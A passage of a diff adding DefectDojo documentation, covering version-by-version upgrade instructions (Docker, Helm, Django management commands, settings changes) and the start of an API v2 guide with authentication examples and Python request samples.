defectdojo/defectdojo-django:latest + docker pull defectdojo/defectdojo-nginx:latest + ``` + +- If you would like to use something older (so not the latest + version), specify the version (tag) you want to upgrade to: + + ``` {.sourceCode .bash} + docker pull defectdojo/defectdojo-django:1.10.2 + docker pull defectdojo/defectdojo-nginx:1.10.2 + ``` + +- Go to the directory where your docker-compose.yml file lives +- Stop DefectDojo: `./dc-stop.sh` +- Re-start DefectDojo, allowing for container recreation: + `./dc-up-d.sh` +- Database migrations will be run automatically by the initializer. + Check the output via `docker-compose logs initializer` or relevant k8s command +- If you have the initializer disabled (or if you want to be on the + safe side), run the migration command: + `docker-compose exec uwsgi /bin/bash -c 'python manage.py migrate` + +### Building your local images + +If you build your images locally and do not use the ones from DockerHub, +the instructions are much the same, except that you'd build your images +first. (Of course, if you're doing this, then you know you have to +update the source code first) + +Replace the first step above with this one: `docker-compose build` + +godojo installations +-------------------- + +If you have installed DefectDojo on "iron" and wish to upgrade the installation, please see the [instructions in the repo](https://github.com/DefectDojo/godojo/blob/master/docs-and-scripts/upgrading.md). + +## Upgrading to DefectDojo Version 2.12.x. + +**Breaking change for search:** The field `cve` has been removed from the search index for Findings and the Vulnerability Ids have been added to the search index. With this the syntax to search explicitly for vulnerability ids have been changed from `cve:` to `vulnerability_id:`, e.g. `vulnerability_id:CVE-2020-27619`. + +This requires a one-time rebuild of the Django-Watson search index. Execute the django command from the defect dojo installation directory or from a shell of the Docker container or Kubernetes pod: + +`./manage.py buildwatson` + +**Upgrade instructions for helm chart with postgres enabled**: The postgres database uses a statefulset by default. Before upgrading the helm chart we have to delete the statefullset and ensure that the pvc is reused, to keep the data. For more information: https://docs.bitnami.com/kubernetes/infrastructure/postgresql/administration/upgrade/ . + +```bash +helm repo update +helm dependency update ./helm/defectdojo + +# obtain name oft the postgres pvc +export POSTGRESQL_PVC=$(kubectl get pvc -l app.kubernetes.io/instance=defectdojo,role=primary -o jsonpath="{.items[0].metadata.name}") + +# delete postgres statefulset +kubectl delete statefulsets.apps defectdojo-postgresql --namespace default --cascade=orphan + +# upgrade +helm upgrade \ + defectdojo \ + ./helm/defectdojo/ \ + --set primary.persistence.existingClaim=$POSTGRESQL_PVC \ + ... # add your custom settings +``` + +## Upgrading to DefectDojo Version 2.10.x. + +**Breaking change for Findings:** The field `cve` will be replaced by a list of Vulnerability Ids, which can store references to security advisories associated with this finding. These can be Common Vulnerabilities and Exposures (CVE) or from other sources, eg. GitHub Security Advisories. Although the field does still exist in the code, the API and the UI have already been changed to use the list of Vulnerability Ids. Other areas like hash code calculation, search and parsers will be migrated step by step in later stages. + +This change also causes an API change for the endpoint `/engagements/{id}/accept_risks/`. + + +## Upgrading to DefectDojo Version 2.9.x. + +**Breaking change for APIv2:** `configuration_url` was removed from API endpoint `/api/v2/tool_configurations/` due to redundancy. + + +## Upgrading to DefectDojo Version 2.8.x. + +**Breaking change for Docker Compose:** Starting DefectDojo with Docker Compose now supports 2 databases (MySQL and PostgreSQL) and 2 celery brokers (RabbitMQ and Redis). To make this possible, docker-compose needs to be started with the parameters `--profile` and `--env-file`. You can get more information in [Setup via Docker Compose - Profiles](https://github.com/DefectDojo/django-DefectDojo/blob/master/readme-docs/DOCKER.md#setup-via-docker-compose---profiles). The profile `mysql-rabbitmq` provides the same configuration as in previous releases. With this the prerequisites have changed as well: Docker requires at least version 19.03.0 and Docker Compose 1.28.0. + +**Breaking change for Helm Chart:** In one of the last releases we upgraded the redis dependency in our helm chart without renaming keys in our helm chart. We fixed this bug with this release, but you may want to check if all redis values are correct ([Pull Request](https://github.com/DefectDojo/django-DefectDojo/pull/5886)). + +The flexible permissions for the configuration of DefectDojo are now active by default. With this, the flag **Staff** for users is not relevant and not visible anymore. The old behaviour can still be activated by setting the parameter `FEATURE_CONFIGURATION_AUTHORIZATION` to `False`. If you haven't done so with the previous release, you can still run a migration script with `./manage.py migrate_staff_users`. This script: + +* creates a group for all staff users, +* sets all configuration permissions that staff users had and +* sets the global Owner role, if `AUTHORIZATION_STAFF_OVERRIDE` is set to `True`. + +## Upgrading to DefectDojo Version 2.7.x. + +This release is a breaking change regarding the Choctaw Hog parser. As the maintainers of this project unified multiple parsers under the RustyHog parser, we now support the parsing of Choctaw Hog JSON output files through the Rusty Hog parser. Furthermore, we also support Gottingen Hog and Essex Hog JSON output files with the RustyHog parser. + +There is another breaking change regarding the import of SSLyze scans. The parser has been renamed from `SSLyze 3 Scan (JSON)` to `SSLyze Scan (JSON)`. The data in the database is fixed by the initializer, but it may break scripted API calls. + +Release 2.7.0 contains a beta functionality to make permissions for the configuration of DefectDojo more flexible. When the settings parameter `FEATURE_CONFIGURATION_AUTHORIZATION` is set to `True`, many configuration dialogues and API endpoints can be enabled for users or groups of users, regardless of their **Superuser** or **Staff** status, see [Configuration Permissions]({{< ref "../usage/permissions/#configuration-permissions" >}}). + +The functionality using the flag `AUTHORIZATION_STAFF_OVERRIDE` has been removed. The same result can be achieved with giving the staff users a global Owner role. + +To support the transition for these 2 changes, you can run a migration script with ``./manage.py migrate_staff_users``. This script: + +* creates a group for all staff users, +* sets all configuration permissions that staff users had and +* sets the global Owner role, if `AUTHORIZATION_STAFF_OVERRIDE` is set to `True`. + +## Upgrading to DefectDojo Version 2.6.x. + +There are no special instruction for upgrading to 2.6.0. Check the [Release Notes](https://github.com/DefectDojo/django-DefectDojo/releases/tag/2.6.0) for the contents of the release. + +Please consult the security advisories [GHSA-f82x-m585-gj24](https://github.com/DefectDojo/django-DefectDojo/security/advisories/GHSA-f82x-m585-gj24) (moderate) and [GHSA-v7fv-g69g-x7p2](https://github.com/DefectDojo/django-DefectDojo/security/advisories/GHSA-v7fv-g69g-x7p2) (high) to see what security issues were fixed in this release. These will be published and become visible at January 18th, 2022. + +## Upgrading to DefectDojo Version 2.5.x. + +Legacy authorization has been completely removed with version 2.5.0. This includes removal of the migration of users +to the new authorization as described in https://defectdojo.github.io/django-DefectDojo/getting_started/upgrading/#authorization. +If you are still using the legacy authorization, you should run the migration with ``./manage.py migrate_authorization_v2`` +before upgrading to version 2.5.0 + +This release introduces the "Forgot password" functionality (`DD_FORGOT_PASSWORD`: default `True`). The function +allows sending an e-mail with the reset password link. Missing configuration or misconfiguration of SMTP +(`DD_EMAIL_URL`) could raise an error (HTTP-500). Check and test (for example by resetting your own password) if you +configured SMTP correctly. If you want to avoid HTTP-500 and you don't want to set up SMTP, you can just simply switch +off the "Forgot password" functionality (`DD_FORGOT_PASSWORD=False`). + +Release renamed system setting `mail_notifications_from` to `email_from`. This value will not be used only for sending +notifications but also for sending the reset password emails. It is highly recommended to check the content of this +value if you are satisfied. If you installed DefectDojo earlier, you can expect `"from@example.com"` there. A fresh +installation will use `"no-reply@example.com"` + +This release [updates](https://github.com/DefectDojo/django-DefectDojo/pull/5450) our helm dependencies. There is a breaking change if you are using the mysql database from the helm chart because we replaced the deprecated chart from the stable repo with a chart from bitnami. If you have persistance enabled, ensure to backup your data before upgrading. All data get lost when replacing the mysql chart during the upgrade. For data migration take a look at the mysql backup and restore process. + +Furthermore we updated our kubernetes version. Current tests run on 1.18.16 and 1.22.0. + +## Upgrading to DefectDojo Version 2.4.x. (Security Release) + +This releases fixes a High severity vulnerability for which the details will be disclosed on November 16th in [GHSA-fwg9-752c-qh8w](https://github.com/DefectDojo/django-DefectDojo/security/advisories/GHSA-fwg9-752c-qh8w) + +There is a breaking change in the API for importing and re-importings scans with SonarQube API and Cobalt.io API. The [scan configurations +have been unified](https://github.com/DefectDojo/django-DefectDojo/pull/5289) and are set now with the attribute `api_scan_configuration`. +The existing configurations for SonarQube API and Cobalt.io API have been migrated. + +At the request of pyup.io, we had to remove the parser for Safety scans. + + +## Upgrading to DefectDojo Version 2.3.x. + +There are no special instruction for upgrading to 2.3.0. +In 2.3.0 we [changed the default password hashing algorithm to Argon2 (from PBKDF2)](https://github.com/DefectDojo/django-DefectDojo/pull/5205). +When logging in, exising hashes get replaced by an Argon2 hash. If you want to rehash password without users having to login, +please see the [Django password management docs](https://docs.djangoproject.com/en/3.2/topics/auth/passwords/). +The previous password hashing algorithm (PBKDF2) was not unsafe, but we wanted to follow the [OWASP guidelines](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html). + + +## Upgrading to DefectDojo Version 2.2.x. + +Upgrade to 2.0.0 contained migration of endpoints. Some parts of migration haven't been done properly. This deficiency +may manifest as a doubled slash in endpoint URLs (like `http://foo.bar:8080//test`) or as a problem with deduplication +of the same endpoints. The mentioned bug was fixed in 2.2.0 and if you have seen these kinds of problems, just rerun +"Endpoint migration" as it is written in [Upgrading to DefectDojo Version 2.0.x.](#upgrading-to-defectdojo-version-20x). + + +## Upgrading to DefectDojo Version 2.0.x. + +Follow the usual steps to upgrade as described above. + +BEFORE UPGRADING +- If you are using SAML2 checkout the new [documentaion](https://defectdojo.github.io/django-DefectDojo/integrations/social-authentication/#saml-20) and update you settings following the migration section. We replaced [django-saml2-auth](https://github.com/fangli/django-saml2-auth) with [djangosaml2](https://github.com/IdentityPython/djangosaml2). + +AFTER UPGRADING +- Usual migration process (`python manage.py migrate`) try to migrate all endpoints to new format and merge duplicates. +- All broken endpoints (which weren't possible to migrate) have red flag 🚩 in standard list of endpoints. +- Check if all your endpoints was migrated successfully, go to: https:///endpoint/migrate. +- Alternatively, this can be run as management command: `docker-compose exec uwsgi ./manage.py endpoint_migration --dry-run` +- When all endpoint will be fixed (there is not broken endpoint), press "Run migration" in https:///endpoint/migrate +- Or, you can run management command: `docker-compose exec uwsgi ./manage.py endpoint_migration` +- Details about endpoint migration / improvements in https://github.com/DefectDojo/django-DefectDojo/pull/4473 + +We decided to name this version 2.0.0 because we did some big cleanups in this release: + +- Remove API v1 ([#4413](https://github.com/DefectDojo/django-DefectDojo/pull/4413)) +- Remove setup.bash installation method ([#4417](https://github.com/DefectDojo/django-DefectDojo/pull/4417)) +- Rename Finding.is_Mitigated field to Finding.is_mitigated ([#3854](https://github.com/DefectDojo/django-DefectDojo/pull/4854)) +- Remove everything related to the old tagging library ([#4419](https://github.com/DefectDojo/django-DefectDojo/pull/4419)) +- Remove S0/S1/S2../S5 severity display option ([#4415](https://github.com/DefectDojo/django-DefectDojo/pull/4415)) +- Refactor EndPoint handling/formatting ([#4473](https://github.com/DefectDojo/django-DefectDojo/pull/4473)) +- Upgrade to Django 3.x ([#3632](https://github.com/DefectDojo/django-DefectDojo/pull/3632)) +- PDF Reports removed ([#4418](https://github.com/DefectDojo/django-DefectDojo/pull/4418)) +- Hashcode calculation logic has changed. To update existing findings run: + + `./manage.py dedupe --hash_code_only`. + +If you're using docker: + +`docker-compose exec uwsgi ./manage.py dedupe --hash_code_only`. + +This can take a while depending on your instance size. + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/2.0.0 + +### Endpoints + +- The usual migration process (`python manage.py migrate`) tries to migrate all endpoints to new format and merge duplicates. +- All broken endpoints (which weren't possible to migrate) have a red flag 🚩 in the standard list of endpoints. +- Check if all your endpoints were migrated successfully, go to: https:///endpoint/migrate. +- Alternatively, this can be run as management command: `docker-compose exec uwsgi ./manage.py endpoint_migration --dry-run` +- When all endpoint are fixed (there is not broken endpoint), press "Run migration" in https:///endpoint/migrate +- Or, you can run management command: `docker-compose exec uwsgi ./manage.py endpoint_migration` +- Details about endpoint migration / improvements in https://github.com/DefectDojo/django-DefectDojo/pull/4473 + +### Authorization + +The new authorization system for Products and Product Types based on roles is the default now. The fields for authorized users are not available anymore, but you can assign roles as described in [Permissions](../../usage/permissions). Users are migrated automatically, so that their permissions are as close as possible to the previous authorization: +- Superusers will still have all permissions on Products and Product Types, so they must not be changed. +- Staff users have had all permissions for all product types and products, so they will be get a global role as *Owner*. +- Product_Members and Product Type_Members will be added for authorized users according to the settings for the previous authorization: + - The *Reader* role is set as the default. + - If `AUTHORIZED_USERS_ALLOW_STAFF` is `True`, the user will get the *Owner* role for the respective Product or Product Type. + - If `AUTHORIZED_USERS_ALLOW_CHANGE` or `AUTHORIZED_USERS_ALLOW_DELETE` is `True`, the user will get the *Writer* role for the respective Product or Product Type. + +The new authorization is active for both UI and API. Permissions set via authorized users or via the Django Admin interface are no longer taken into account. + +Please review the roles for your users after the upgrade to avoid an unintended permissions creep. + + +## Upgrading to DefectDojo Version 1.15.x + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.15.0 +- If you have made changes to JIRA templates or the template config in the JIRA Project config for instances/products/engagements: +The jira template settings introduced in 1.13 have been changed. You now have to select a subfolder instead of a sinlge template file. If you have chosen a non-default template here, you have to reapply that to all products / engagements. Also you have to move your custom templates into the correct subfolder in `dojo/templates/issue-trackers/`. +- Hashcode calculation logic has changed in #4134, #4308 and #4310 to update existing findings run: + + `./manage.py dedupe --hash_code_only` + +If you're using docker: + +`docker-compose exec uwsgi ./manage.py dedupe --hash_code_only` + +This can take a while depending on your instance size. + + + +## Upgrading to DefectDojo Version 1.14.x + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.14.0 + +Note that the below fields are now optional without default value. They will not be filled anymore with values such as "No references given" when found empty while saving the findings +- mitigation +- references +- impact +- url + + + +## Upgrading to DefectDojo Version 1.13.x + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.13.0 +- Hashcode settings affecting deduplication have changed, to update existing findings run: + + `./manage.py dedupe` + +If you're using docker: + + docker-compose exec uwsgi ./manage.py dedupe + +This can take a while depeneding on your instance size. It might possible that new duplicates are detected among existing findings, so make a backup before running! + + +## Upgrading to DefectDojo Version 1.12.x + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.12.0 +- 1.12.1 is a security release https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.12.1 + +## Upgrading to DefectDojo Version 1.11.x + +- See release notes: https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.11.0 +- 1.11.1 is a security release https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.11.1 + +## Upgrading to DefectDojo Version 1.10.x + +**1.10.4 is a security release** + +- See the security advisory: + +- See release notes: + +- Version 1.10.4 replaces 1.10.3 as the latter contained an incomplete + fix + +**What\'s New:** + +- See release notes: + +- DefectDojo now provides a `settings.py` file + out-of-the-box. Custom settings need to go into + `local\_settings.py`. See + + and + +- A quickfix is to rename your own / customized + `settings.py` or `settings.dist.py` to + `local\_settings.py`. Details of that PR: + +- Major JIRA integration refactoring, for which you should at least + use 1.10.1 and not 1.10.0 for many bug fixes. + +**Breaking changes** + +Kubernetes/Helm users: we have moved away from the \"stable\" repository +to \"bitnami\" in this release. The bitnami postgresql chart required us +to add a new key to the postgresql secret, which will give you the error +`postgresql-postgres-password is missing` if you have +`createPostgresqlSecret: false`. In 1.10.1, a fix was also included to +allow your existing `postgresqlPassword` to be reused properly. + +Including in 1.10.1 were a couple fixes related to a rabbitMQ upgrade. +The path to access `password`, `erlangCookie` and +`existingPasswordSecret` changed from `rabbitmq` to `auth`. Furthermore, +as rabbitMQ is deployed as a StatefulSet, an in-place upgrade is not +possible and an error will likely be thrown such as +`Forbidden: updates to statefulset spec for fields other than 'replicas', 'template', and 'updateStrategy' are forbidden`. +After ensuring your rabbitMQ celery queue is empty, you will then want +to delete your rabbitMQ StatefulSet and PVC to allow them to get +re-created, or fully delete and recreate defectdojo. + +## Upgrading to DefectDojo Version 1.9.3 + +**This is a security release** + +- See the [security + advisory](https://github.com/DefectDojo/django-DefectDojo/security/advisories/GHSA-8q8j-7wc4-vjg5) +- See [release + notes](https://github.com/DefectDojo/django-DefectDojo/releases/tag/1.9.3) + +**What\'s New:** + +- See release notes: + + +**NOTE:** + +When upgrading from before 1.9.2, a corrective script may need to be ran + +`./manage.py create\_endpoint\_status` + +If you\'re using docker: + +`docker-compose exec uwsgi ./manage.py create\_endpoint\_status` + +This can take a while depending on your hardware and the number of +findings in your instance. + +- Search index tweaking index rebuild after upgrade: + +This requires a (one-time) rebuild of the Django-Watson search index. +Execute the django command from the defect dojo installation directory: + +`./manage.py buildwatson]` + +If you\'re using docker: + +`docker-compose exec uwsgi ./manage.py buildwatson` + +This can take a while depending on your hardware and the number of +findings in your instance. + +## Upgrading to DefectDojo Version 1.8.0 + +**What\'s New:** + +- See release notes: + +- Improved search, which requires an index rebuild + () + +This requires a (one-time) rebuild of the Django-Watson search index. +Execute the django command from the defect dojo installation directory: + +`./manage.py buildwatson` + +If you\'re using docker: + +`docker-compose exec uwsgi ./manage.py buildwatson` + +This can take a while depending on your hardware and the number of +findings in your instance. + +- **NOTE:** + +As a result of a breaking bug revolving around Endpoint\_status objects, +a corrective script will need to be ran after every dynamic scan +imported through either API version. + +The script can be found +[here](https://github.com/DefectDojo/django-DefectDojo/blob/dev/dojo/management/commands/create_endpoint_status.py) + +`./manage.py create\_endpoint\_status` + +If you\'re using docker: + +`docker-compose exec uwsgi ./manage.py create\_endpoint\_status` + +This can take a while depending on your hardware and the number of +findings in your instance. + +## Upgrading to DefectDojo Version 1.7.0 + +**What\'s New:** + +- Updated search, you can now search for CVE-XXXX-YYYY +- Updated search index, fields added to index: \'id\', \'title\', + \'cve\', \'url\', \'severity\', \'description\', \'mitigation\', + \'impact\', \'steps\_to\_reproduce\', \'severity\_justification\', + \'references\', \'sourcefilepath\', \'sourcefile\', \'hash\_code\', + \'file\_path\', \'component\_name\', \'component\_version\', + \'unique\_id\_from\_tool\' + +This requires a (one-time) rebuild of the Django-Watson search index. +Execute the django command from the defect dojo installation directory: + +`./manage.py buildwatson dojo.Finding` + +If you\'re using docker: + +`docker-compose exec uwsgi ./manage.py buildwatson dojo.Finding` + +Upgrading to DefectDojo Version 1.5.0 +------------------------------------- + +**What\'s New:** + +- Updated UI with a new DefectDojo logo, default colors and CSS. +- Updated Product views with tabs for Product Overview, Metrics, + Engagements, Endpoints, Benchmarks (ASVS), and Settings to make it + easier to navigate and manage your products. +- New Product Information fields: Regulations, Criticality, Platform, + Lifecycle, Origin, User Records, Revenue, External Audience, + Internet Accessible +- Languages pie chart on product overview, only supported through the + API and Django admin, integrates with cloc analyzer +- New Engagement type of CI/CD to support continual testing +- Engagement shortcuts and ability to import findings and auto-create + an engagement +- Engagement labels for overdue, no tests and findings +- New Contextual menus throughout DefectDojo and shortcuts to new + findings and critical findings +- Ability to merge a finding into a parent finding and either + inactivate or delete the merged findings. +- Report improvements and styling adjustment with the default option + of HTML reports +- SLA for remediation of severities based on finding criticality, for + example critical findings remediated within 7 days. Configurable in + System Settings. +- Engagement Auto-Close Days in System Settings. Automatically close + an engagement if open past the end date. +- Ability to apply remediation advice based on CWE. For example XSS + can be configured as a template so that it\'s consistent across all + findings. Enabled in system settings. +- Finding confidence field supported from scanners. First + implementation in the Burp importer. +- Goast importer for static analysis of Golang products +- Celery status check on System Settings +- Beta rules framework release for modifying findings on the fly +- DefectDojo 2.0 API with Swagger support +- Created and Modified fields on all major tables +- Various bug fixes reported on Github + +**Upgrading to 1.5.0 requirements:** + +1. Back up your database first, ideally take the backup from production + and test the upgrade on a staging server. +2. Edit the settings.py file which can be found in + `django-DefectDojo/dojo/settings/settings.py`. Copy in the rest + framework configuration after the CSRF\_COOKIE\_SECURE = True: + + REST_FRAMEWORK = { + 'DEFAULT_AUTHENTICATION_CLASSES': ( + 'rest_framework.authentication.TokenAuthentication', + 'rest_framework.authentication.BasicAuthentication', + ), + 'DEFAULT_PERMISSION_CLASSES': ( + 'rest_framework.permissions.DjangoModelPermissions', + ), + 'DEFAULT_RENDERER_CLASSES': ( + 'rest_framework.renderers.JSONRenderer', + ), + 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination', + 'PAGE_SIZE': 25 + } + +Navigate to: LOGIN\_EXEMPT\_URLS and add the following after +r\'\^%sfinding/image/(?P\\[\^/\]+)\$\' % URL\_PREFIX: + + r'^%sfinding/image/(?P[^/]+)$' % URL_PREFIX, + r'^%sapi/v2/' % URL_PREFIX, + +Navigate to: INSTALLED\_APPS and add the following after: +\'multiselectfield\',: + + 'multiselectfield', + 'rest_framework', + 'rest_framework.authtoken', + 'rest_framework_swagger', + 'dbbackup', + +Navigate to: CELERY\_TASK\_IGNORE\_RESULT = True and add the following +after CELERY\_TASK\_IGNORE\_RESULT line: + + CELERY_RESULT_BACKEND = 'db+sqlite:///dojo.celeryresults.sqlite' + +Save your modified settings file. For reference the modified file should +look like the new 1.5.0 +\[settings\]() +file, minus the environmental configurations. As an alternative this +file can be used and the enviromental configurations from you +environment can be copied into this file. + +3. Activate your virtual environment and then upgrade the requirements: + +`pip install -r requirements.txt --upgrade` + +4. Upgrade the database: + + ./manage.py makemigrations + ./manage.py migrate + +5. Collect the static files (Javascript, Images, CSS): + + ./manage.py collectstatic --noinput + +6. Complete + +## Upgrading to DefectDojo Version 1.3.1 + +**What\'s New:** + +- New importers for Contrast, Nikto and TruffleHog (finding secrets in + git repos). +- Improved merging of findings for dynamic and static importers +- Markdown support for findings +- HTML report improvements including support of Markdown. +- System settings Celery status page to assist in debugging if Celery + is functional. + +**Upgrading to 1.3.1 requires:** + +1. pip install markdown pip install pandas +2. ./manage.py makemigrations ./manage.py migrate +3. ./manage.py collectstatic \--noinput +4. Complete + +## Upgrading to DefectDojo Version 1.2.9 + +**What\'s New:** New feature: Benchmarks (OWASP ASVS) + +**Upgrading to 1.2.9 requires:** + +1. ./manage.py makemigrations ./manage.py migrate ./manage.py loaddata + dojo/fixtures/benchmark\_type.json ./manage.py loaddata + dojo/fixtures/benchmark\_category.json ./manage.py loaddata + dojo/fixtures/benchmark\_requirement.json +2. ./manage.py collectstatic \--noinput +3. Complete + +## Upgrading to DefectDojo Version 1.2.8 + +New feature: Product Grading (Overall Product Health) Upgrading to 1.2.8 +requires: + +1. ./manage.py makemigrations ./manage.py migrate ./manage.py + system\_settings +2. ./manage.py collectstatic \--noinput +3. pip install asteval +4. pip install \--upgrade celery +5. Complete + +## Upgrading to DefectDojo Version 1.2.4 + +Upgrading to 1.2.4 requires: + +1. ./manage.py makemigrations ./manage.py migrate ./manage.py loaddata + dojo/fixtures/objects\_review.json + +## Upgrading to DefectDojo Version 1.2.3 + +Upgrading to 1.2.3 requires: + +1. ./manage.py makemigrations ./manage.py migrate ./manage.py loaddata + dojo/fixtures/language\_type.json +2. Currently languages and technologies can be updated via the API or + in the admin section of Django. + +## July 6th 2017 - New location for system settings + +Pull request \#313 moves a number of system settings previously located +in the application\'s settings.py to a model that can be used and +changed within the web application under \"Configuration -\> System +Settings\". + +If you\'re using a custom `URL_PREFIX` you will need to set this in the +model after upgrading by editing `dojo/fixtures/system_settings.json` +and setting your URL prefix in the `url_prefix` value there. Then issue +the command `./manage.py loaddata system_settings.json` to load your +settings into the database. + +If you\'re not using a custom `URL_PREFIX`, after upgrading simply go to +the System Settings page and review which values you want to set for +each setting, as they\'re not automatically migrated from settings.py. + +If you like you can then remove the following settings from settings.py +to avoid confusion: + +- `ENABLE_DEDUPLICATION` +- `ENABLE_JIRA` +- `S_FINDING_SEVERITY_NAMING` +- `URL_PREFIX` +- `TIME_ZONE` +- `TEAM_NAME` + +## Upgrading to DefectDojo Version 1.2.2 + +Upgrading to 1.2.2 requires: + +1. Copying settings.py to the settings/ folder. +2. If you have supervisor scripts change + DJANGO\_SETTINGS\_MODULE=dojo.settings.settings + +## Upgrading to Django 1.1.5 + +If you are upgrading an existing version of DefectDojo, you will need to +run the following commands manually: + +1. First install Yarn. Follow the instructions based on your OS: + +2. The following must be removed/commented out from `settings.py`: : + + 'djangobower.finders.BowerFinder', + + From the line that contains: + # where should bower install components + ... + + To the end of the bower declarations + 'justgage' + ) + +3. The following needs to be updated in `settings.py`: : + + STATICFILES_DIRS = ( + # Put strings here, like "/home/html/static" or "C:/www/django/static". + # Always use forward slashes, even on Windows. + # Don't forget to use absolute paths, not relative paths. + os.path.dirname(DOJO_ROOT) + "/components/yarn_components", + ) + +## Upgrading to Django 1.11 + +Pull request \#300 makes DefectDojo Django 1.11 ready. A fresh install +of DefectDojo can be done with the setup.bash script included - no +special steps are required. + +If you are upgrading an existing installation of DefectDojo, you will +need to run the following commands manually: : + + pip install django-tastypie --upgrade + pip install django-tastypie-swagger --upgrade + pip install django-filter --upgrade + pip install django-watson --upgrade + pip install django-polymorphic --upgrade + pip install django --upgrade + pip install pillow --upgrade + ./manage.py makemigrations + ./manage.py migrate + +The following must be removed/commented out from settings.py: : + + TEMPLATE_DIRS + TEMPLATE_DEBUG + TEMPLATE_LOADERS + TEMPLATE_CONTEXT_PROCESSORS + +The following needs to be added to settings.py: : + + TEMPLATES = [ + { + 'BACKEND': 'django.template.backends.django.DjangoTemplates', + 'APP_DIRS': True, + 'OPTIONS': { + 'context_processors': [ + 'django.template.context_processors.debug', + 'django.template.context_processors.request', + 'django.contrib.auth.context_processors.auth', + 'django.contrib.messages.context_processors.messages', + ], + }, + }, + ] + +Once all these steps are completed your installation of DefectDojo will +be running under Django 1.11 diff --git a/docs/content/en/integrations/_index.md b/docs/content/en/integrations/_index.md new file mode 100644 index 00000000000..c34a054de84 --- /dev/null +++ b/docs/content/en/integrations/_index.md @@ -0,0 +1,6 @@ +--- +title: "Integrations" +description: "A lot of integrations help to fit DefectDojo in your environment" +weight: 3 +chapter: true +--- diff --git a/docs/content/en/integrations/api-v2-docs.md b/docs/content/en/integrations/api-v2-docs.md new file mode 100644 index 00000000000..0adbd1abd44 --- /dev/null +++ b/docs/content/en/integrations/api-v2-docs.md @@ -0,0 +1,185 @@ +--- +title: "DefectDojo API v2" +description: "DefectDojo's API lets you automate tasks, e.g. uploading scan reports in CI/CD pipelines." +draft: false +weight: 2 +--- + + + + +DefectDojo\'s API is created using [Django Rest +Framework](http://www.django-rest-framework.org/). The documentation of +each endpoint is available within each DefectDojo installation at +[`/api/v2/doc/`](https://demo.defectdojo.org/api/v2/) and can be accessed by choosing the API v2 +Docs link on the user drop down menu in the header. + +![image](../../images/api_v2_1.png) + +The documentation is generated using [Django Rest Framework +Yet Another Swagger Generator](https://github.com/axnsan12/drf-yasg/), and is +interactive. On the top of API v2 docs is a link that generates an OpenAPI v2 spec. + +As a preparation to move to OpenAPIv3, we have added an compatible spec and documentation at [`/api/v2/oa3/swagger-ui/`](https://demo.defectdojo.org/api/v2/oa3/swagger-ui/?docExpansion=none) + +To interact with the documentation, a valid Authorization header value +is needed. Visit the `/api/v2/key/` view to generate your +API Key (`Token `) and copy the header value provided. + +![image](../../images/api_v2_2.png) + +Each section allows you to make calls to the API and view the Request +URL, Response Body, Response Code and Response Headers. + +![image](../../images/api_v2_3.png) + +If you're logged in to the Defect Dojo web UI, you do not need to provide the authorization token. + +Authentication +-------------- + +The API uses header authentication with API key. The format of the +header should be: : + + Authorization: Token + +For example: : + + Authorization: Token c8572a5adf107a693aa6c72584da31f4d1f1dcff + +Sample Code +----------- + +Here are some simple python examples and their results produced against +the `/users` endpoint: : + +{{< highlight python >}} +import requests + +url = 'http://127.0.0.1:8000/api/v2/users' +headers = {'content-type': 'application/json', + 'Authorization': 'Token c8572a5adf107a693aa6c72584da31f4d1f1dcff'} +r = requests.get(url, headers=headers, verify=True) # set verify to False if ssl cert is self-signed + +for key, value in r.__dict__.items(): + print(f"'{key}': '{value}'") + print('------------------') +{{< /highlight >}} + +This code will return the list of all the users defined in DefectDojo. +The json object result looks like : : + +{{< highlight json >}} + [ + { + "first_name": "Tyagi", + "id": 22, + "last_login": "2019-06-18T08:05:51.925743", + "last_name": "Paz", + "username": "dev7958" + }, + { + "first_name": "saurabh", + "id": 31, + "last_login": "2019-06-06T11:44:32.533035", + "last_name": "", + "username": "saurabh.paz" + } + ] +{{< /highlight >}} + +Here is another example against the `/users` endpoint, this +time we will filter the results to include only the users whose user +name includes `jay`: + +{{< highlight python >}} +import requests + +url = 'http://127.0.0.1:8000/api/v2/users/?username__contains=jay' +headers = {'content-type': 'application/json', + 'Authorization': 'Token c8572a5adf107a693aa6c72584da31f4d1f1dcff'} +r = requests.get(url, headers=headers, verify=True) # set verify to False if ssl cert is self-signed + +for key, value in r.__dict__.items(): + print(f"'{key}': '{value}'") + print('------------------') +{{< /highlight >}} + +The json object result is: : + +{{< highlight json >}} +[ + { + "first_name": "Jay", + "id": 22, + "last_login": "2015-10-28T08:05:51.925743", + "last_name": "Paz", + "username": "jay7958" + }, + { + "first_name": "", + "id": 31, + "last_login": "2015-10-13T11:44:32.533035", + "last_name": "", + "username": "jay.paz" + } +] +{{< /highlight >}} + +See [Django Rest Framework\'s documentation on interacting with an +API](http://www.django-rest-framework.org/topics/api-clients/) for +additional examples and tips. + +Manually calling the API +------------------------ + +Tools like Postman can be used for testing the API. + +Example for importing a scan result: + +- Verb: POST +- URI: +- Headers tab: + + add the authentication header + : - Key: Authorization + - Value: Token c8572a5adf107a693aa6c72584da31f4d1f1dcff + +- Body tab + + - select \"form-data\", click \"bulk edit\". Example for a ZAP scan: + + + + engagement:3 + verified:true + active:true + lead:1 + tags:test + scan_type:ZAP Scan + minimum_severity:Info + skip_duplicates:true + close_old_findings:false + +- Body tab + + - Click \"Key-value\" edit + - Add a \"file\" parameter of type \"file\". This will trigger + multi-part form data for sending the file content + - Browse for the file to upload + +- Click send + +Clients / API Wrappers +---------------------- + +| Wrapper | Status | Notes | +| -----------------------------| ------------------------| ------------------------| +| [Specific python wrapper](https://github.com/DefectDojo/defectdojo_api) | working (2021-01-21) | API Wrapper including scripts for continous CI/CD uploading. Is lagging behind a bit on latest API features as we plan to revamp the API wrapper | +| [Openapi python wrapper](https://github.com/alles-klar/defectdojo-api-v2-client) | | proof of concept only where we found out the the OpenAPI spec is not perfect yet | +| [Java library](https://github.com/secureCodeBox/defectdojo-client-java) | working (2021-08-30) | Created by the kind people of 